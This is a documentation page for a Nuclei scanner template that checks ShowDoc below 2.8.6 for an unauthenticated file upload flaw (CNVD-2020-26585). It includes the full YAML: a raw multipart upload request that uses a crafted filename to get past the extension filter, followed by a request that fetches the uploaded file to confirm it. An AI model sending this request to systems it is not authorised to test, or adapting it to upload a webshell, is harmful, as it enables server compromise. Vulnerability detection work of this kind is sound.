Skip to content
Nuclei Templates

Showdoc <2.8.6 - File Uploads

ID: CNVD-2020-26585

Severity: critical

Author: pikpikcu,Co5mos

Tags: cnvd,cnvd2020,showdoc,fileupload,intrusive

Description

Section titled “Description”

ShowDoc is an online API and technical documentation tool that is very suitable for IT teams. Showdoc has a file upload vulnerability, which attackers can exploit to gain server permissions.

YAML Source

Section titled “YAML Source”
id: CNVD-2020-26585


info:
  name: Showdoc <2.8.6 - File Uploads
  author: pikpikcu,Co5mos
  severity: critical
  description: |
    ShowDoc is an online API and technical documentation tool that is very suitable for IT teams. Showdoc has a file upload vulnerability, which attackers can exploit to gain server permissions.
  reference:
    - https://vul.wangan.com/a/CNVD-2020-26585
    - https://blog.csdn.net/qq_48985780/article/details/122211136
    - https://github.com/star7th/showdoc/pull/1059
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:L/A:L
    cvss-score: 9.9
    cwe-id: CWE-434
  metadata:
    verified: true
    max-request: 2
    fofa-query: app="ShowDoc"
  tags: cnvd,cnvd2020,showdoc,fileupload,intrusive
variables:
  str1: "{{randstr}}"


http:
  - raw:
      - |
        POST /index.php?s=/home/page/uploadImg HTTP/1.1
        Host: {{Hostname}}
        Content-Type: multipart/form-data; boundary=--------------------------835846770881083140190633


        ----------------------------835846770881083140190633
        Content-Disposition: form-data; name="editormd-image-file"; filename="{{randstr}}.<>txt"
        Content-Type: text/plain


        {{str1}}
        ----------------------------835846770881083140190633--
      - |
        GET /Public//Uploads//{{date}}//{{file}} HTTP/1.1
        Host: {{Hostname}}


    matchers:
      - type: dsl
        dsl:
          - status_code_2 == 200
          - body_2 == str1
        condition: and


    extractors:
      - type: regex
        name: date
        part: body
        group: 1
        regex:
          - '(\d{4}-\d{2}-\d{2})\\/([a-f0-9]+\.txt)'
        internal: true


      - type: regex
        name: file
        part: body
        group: 2
        regex:
          - '(\d{4}-\d{2}-\d{2})\\/([a-f0-9]+\.txt)'
        internal: true
# digest: 4a0a00473045022017ca229144593f568ba52de17a1508fafad001d00404fdd5e04432e67c8ed8b9022100d0e5a6d7624bdf4131fc32b1070d8a99fa8480d4d0f91f5faab3e50cc8925e58:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities

Section titled “Guide to check the vulnerabilities”

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/cnvd/2020/CNVD-2020-26585.yaml"

View on Github